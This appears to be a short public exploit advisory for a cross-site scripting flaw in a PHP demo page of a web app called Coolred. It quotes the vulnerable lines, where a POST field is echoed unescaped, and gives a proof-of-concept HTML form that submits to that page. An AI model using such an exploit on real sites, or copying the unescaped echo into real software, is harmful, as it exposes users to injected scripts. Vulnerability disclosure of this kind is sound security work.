[-] Exploit title : Coolred web XSS Vulnerability
[-] Software dl : https://github.com/Coolred/WebApps
[-] Category : WebApps
[-] Author : The_Ripper
[-] Tested on : Win XP
[-] Date : 11-1-2018
[-] Dork : N/A
[-] Telegram : @The_Ripper
==================================
Description :
[-] XSS allows an Attacker to run JavaScript codes.
==================================
Vulnerable page :
http://localhost/coolred/SimplyBank/demo/runPerso.php
==================================
Vulnerable source :
line 10 >> $script_input = $_POST['script'];
line 104 >> echo $script_input;
==================================
PoC :
As you can see up here $script_input variable has xss bug
and here's the exploit . Enjoy
Exploit :
<form action="http://localhost/coolred/SimplyBank/demo/runPerso.php" method="post">
<input type="text" name="script">
<input type="submit">
</form>